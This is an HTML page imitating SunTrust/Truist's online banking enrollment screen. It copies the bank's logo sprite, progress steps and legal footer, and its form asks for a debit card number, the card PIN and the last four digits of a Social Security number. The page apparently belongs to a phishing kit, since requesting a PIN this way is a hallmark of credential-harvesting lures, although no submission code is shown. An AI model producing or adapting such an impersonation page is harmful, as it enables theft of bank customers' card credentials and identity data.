<!DOCTYPE html>
<html>
<head>
<title></title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
.main_container1{
	max-width:768px;
	margin:0 auto;
	font-family: suntrustregular,"Trebuchet MS",sans-serif;
	padding:0 20px;
}
.main_container{
	max-width:1000px;
	margin:0 auto;
	font-family: suntrustregular,"Trebuchet MS",sans-serif;
	padding:0 20px;
}
.header_top1{
	text-align:center;
}
.logo123{
	width: 210px;
    height: 45px;
	display: inline-block;
    background-image: url('https://www1.onlinebanking.suntrust.com/UI/assetsbuild/images/suntrust-img-sprite.png');
    background-position: 0 -253px;
    width: 210px;
    height: 45px;
}
.main_section h2{
	font-family: suntrustregular,"Trebuchet MS",sans-serif;
}



.progress{list-style:none;margin:0;padding:0;}
ol{list-style:lower-alpha outside;}
.progress-step{border:0;clip:rect(0 0 0 0);height:1px;top:-1px;overflow:hidden;padding:0;position:absolute;width:1px;}
.progress{white-space:nowrap;}
.progress>.progress-item{display:inline-block;position:relative;padding:13px 0 13px 34px;font-size:14px;font-size:1.4rem;line-height:14px;line-height:1.4rem;font-weight:700;color:#707070;background:#f4f4f4;text-align:center;}
.progress>.progress-item>.progress-text{margin:0;font-size: 13px;}
.progress>.progress-item:after{content:"";border-top:24px solid transparent;border-bottom:24px solid transparent;border-left:22px solid #f4f4f4;position:absolute;right:-22px;top:0;z-index:1;}
.progress>.progress-item:before{content:"";border-top:24px solid transparent;border-bottom:24px solid transparent;border-left:22px solid #fff;position:absolute;left:0;top:0;}
.progress>.progress-item:first-child{padding-left:15px;border-top-left-radius:3px;border-bottom-left-radius:3px;}
.progress>.progress-item:first-child:before{display:none;}
.progress>.progress-item:last-child{padding-right:15px;border-top-right-radius:3px;border-bottom-right-radius:3px;}
.progress>.progress-item:last-child:after{display:none;}
.progress>.progress-item.progress-active{background:#f5ecdd;}
.progress>.progress-item.progress-active:after{border-left-color:#f5ecdd;}
.progress{display:table;width:100%;}
.progress>.progress-item{background:#f4f4f4;display:table-cell;}
.progress>.progress-item:before{border-top:28px solid transparent;border-bottom:28px solid transparent;border-left:25px solid #fff;left:0;top:-4px;}
.progress>.progress-item:after{border-left:22px solid #f4f4f4;}
.progress>.progress-item.progress-active{color:#ee6120;background:#f5ecdd;}
.progress>.progress-item.progress-active:after{border-left-color:#f5ecdd;}
.suntrust-login-status .progress{margin-bottom:10px;}

.progress>.progress-item.progress-active{color:#ba4506;}
@media screen and (min-width: 320px) and (max-width: 763px){
.suntrust-enrollment-mobile .progress{margin-top:15px;}
}

.form-title {
    font-weight: 700;
    margin-bottom: 10px;
    padding-left: 30px;
    font-size: 18px;
}
.user_form {
    padding: 0 10%;
}
.form_two {
    display: grid;
    grid-template-columns: 50% 50%;
    max-width: 500px;
    margin: 20px 0;
	align-items: center;
}
label.inline-label {
    text-align: right;
    padding: 15px;
	font-weight:bold;
}
input.input-text {
    padding: 8px;
    font-size: 18px;
}
span.label-note {
    display: block;
    font-size: 13px;
    color: #707070;
}
.action-part {
    text-align: right;
    padding-right: 100px;
}
.new_btn {
    padding: 8px 30px;
    border-radius: 4px;
    text-decoration: none;
}
a.next.new_btn {
    background: #00294D;
    color: #Fff;
}


footer a {
    color: #003871;
	text-decoration:none;
}

.footer-list{list-style:none;margin:0;width:100%;padding:20px 0;background:#f4f4f4;text-align:center;font-size:12px;}
.footer-list>li{display:inline-block;margin:5px 20px;}
@media (max-width:600px){
.footer-list>li{display:block;}
}
.footer-link:hover,.suntrust-secure-link:hover{text-decoration:underline;}
footer {
    background: #f4f4f4;
    padding: 80px 0 20px;
    position: relative;
    overflow: hidden;
    margin-top: 60px;
    color: #999;
    font-size: 12px;
    line-height: 1.5;
}
footer:before {
    content: '';
    width: 103%;
    height: 106px;
    position: absolute;
    top: -50px;
    background: white;
    border-radius: 50%;
    left: -5px;
}

.cancel i{
}
.footer-product-list{padding:0;margin:0;}
 .footer-product-list>li{display:inline;}




@media only screen and (max-width: 600px) {
	.progress>.progress-item {
		font-size: 0.9rem;
		line-height: 1.2rem;
	}
	.form_two {
		grid-template-columns: 100%;
	}
	label.inline-label {
		text-align: left;
		padding: 0;
		font-size: 13px;
	}
	span.label-note {
		display: inline;
	}
	.action-part {
		width: 95%;
	}
	a.cancel.new_btn {
		float: left;
	}
	a.next.new_btn {
		float: right;
	}
	.user_form {
		padding: 0;
	}
	.form-title {
		padding-left: 0px;
	}
}
</style>
</head>
<body>

<section>
	<div class="main_container1">
		<div class="header_top1">
			<span class="logo123"></span>
		</div>
		
		<div class="main_section">
			<h2>Online Banking Enrollment</h2>
			<ol class="progress">
				<li class="progress-item progress-active">
					<p class="progress-text">
						<span class="progress-step">Step 1 of 3</span> Verification
					</p>
				</li>
				<li class="progress-item">
					<p class="progress-text">
						<span class="progress-step">Step 2 of 3</span> Security
					</p>
				</li>
				<li class="progress-item">
					<p class="progress-text">
						<span class="progress-step">Step 3 of 3</span> Services
					</p>
				</li>
			</ol>
			<hr>
			<div class="">
				<h4 class="form-title">Verify with a SunTrust Debit Card</h4>
				<div class="user_form">
					<div class="form_two">
						<label for="debitCardNumber" class="inline-label">SunTrust Debit Card Number</label>
						<input type="text" class="input-text" id="debitCardNumber" maxlength="17">
					</div>
					<div class="form_two">
						<label for="debitCardPIN" class="inline-label">SunTrust Debit Card PIN</label>
						<input  type="password" class="input-text" id="debitCardPIN" maxlength="4" >
					</div>
					<div class="form_two">
						<label for="ssn" class="inline-label">Social Security Number <span class="label-note">(Last 4 digits)</span></label>
						<input type="text" class="input-text" maxlength="4" id="ssn">
					</div>
				</div>
				<div class="action-part">
					<a href="" class="cancel new_btn"><i class="fa fa-times-circle" aria-hidden="true"></i> Cancel</a>
					<a href="" class="next new_btn">Next</a>
				</div>
			</div>
		</div>
	</div>
</section>

<footer>
	<ul class="footer-list">
            <li class="link-item">
                <a id="sunTrustSite" class="footer-link" target="_blank" href="https://www.suntrust.com">
                    SunTrust.com
                </a>
            </li>
            <li class="link-item">
                <a id="onlineSvcAgreement" class="footer-link" target="_blank" href="https://www.suntrust.com/content/dam/suntrust/us/en/personal-banking/2017/terms-and-conditions/online-banking-terms-and-conditions.pdf">
                    Online Services Agreement
                </a>
            </li>
            <li class="link-item">
                <a id="billPayGuarantee" class="footer-link" target="_blank" href="https://www.suntrust.com/content/dam/suntrust/us/en/personal-banking/2017/documents/suntrust-bill-pay-guarantee.pdf">
                    Bill Pay Guarantee
                </a>
            </li>
            <li class="link-item">
                <a id="privacy" class="footer-link" target="_blank" href="https://www.suntrust.com/Privacy">
                    Privacy
                </a>
            </li>
            <li class="link-item">
                <a id="fraudAndSecurity" class="suntrust-secure-link" target="_blank" href="https://www.suntrust.com/fraud-and-security-department ">
                    Security and Fraud <i class="fa fa-lock" aria-hidden="true"></i>
                </a>
            </li>
        </ul>
		
		<div class="main_container">
			<p> Truist Bank is an Equal Housing Lender. Member FDIC. ©2021 Truist  Financial Corporation. Truist, SunTrust®, the SunTrust logo, Truist Purple, and the Truist logo are service marks of Truist Financial Corporation. All rights reserved.</p>
			<p><strong>Investment and Insurance Products:</strong></p>
			<ul class="footer-product-list">
				<li><strong>• Are not FDIC or any other Government Agency Insured</strong> </li>
				<li><strong>• Are not Bank Guaranteed</strong> </li>
				<li><strong>• May Lose Value</strong></li>
			</ul>
			<p>Truist Wealth is a marketing name used by Truist Financial Corporation. Services are offered by the following affiliates of Truist Financial Corporation: Banking products 
			and services, including loans and deposit accounts, are provided by SunTrust Bank and 
			Branch Banking and Trust Company, both now Truist Bank, Member FDIC. Trust and 
			investment management services are provided by SunTrust Bank and Branch Banking and
			Trust Company, both now Truist Bank, and SunTrust Delaware Trust Company. Securities,
			brokerage accounts and/or insurance (including annuities) are offered by Truist Investment Services, Inc. 
			(<i>d/b/a</i> SunTrust Investment Services, Inc.) and P.J. Robb Variable Corp., which are each SEC registered broker-dealers, members 
			<a href="https://www.suntrust.com/External?url=https://www.finra.org/" target="_blank">FINRA<span class="suntrust-accessible-text"> The link will open in new window or tab  </span> </a>, 
			<a href="https://www.suntrust.com/External?url=https://www.sipc.org/" target="_blank">SIPC <span class="suntrust-accessible-text"> The link will open in new window or tab  </span></a> 
			and a licensed insurance agency where applicable. Life insurance products are offered through Truist Life Insurance Services, a division of Crump Life Insurance Services, Inc.,
			AR license #100103477, a wholly owned subsidiary of Truist Insurance Holdings,  Inc.  Investment advisory services are offered by Truist Advisory Services, Inc. 
			(<i>d/b/a</i> SunTrust Advisory Services, Inc.), GFO Advisory Services, LLC, Sterling Capital Management, LLC, BB&amp;T Institutional Investment Advisors, Inc. 
			and Precept Advisory Group, LLC, each SEC registered investment advisors.  Sterling Capital Funds are advised by Sterling Capital Management, LLC.
			</p>
			<p>Please see the following for <a href="https://www.suntrust.com/content/dam/suntrust/us/en/premier-banking-and-investing-group/2020/documents/third-party-cusip-database-disclosure.pdf" target="_blank">information<span class="suntrust-accessible-text"> The link will open in new window or tab  </span> </a> related to the third party Cusip Database terms and conditions.</p>
		</div>
</footer>



</body>
</html>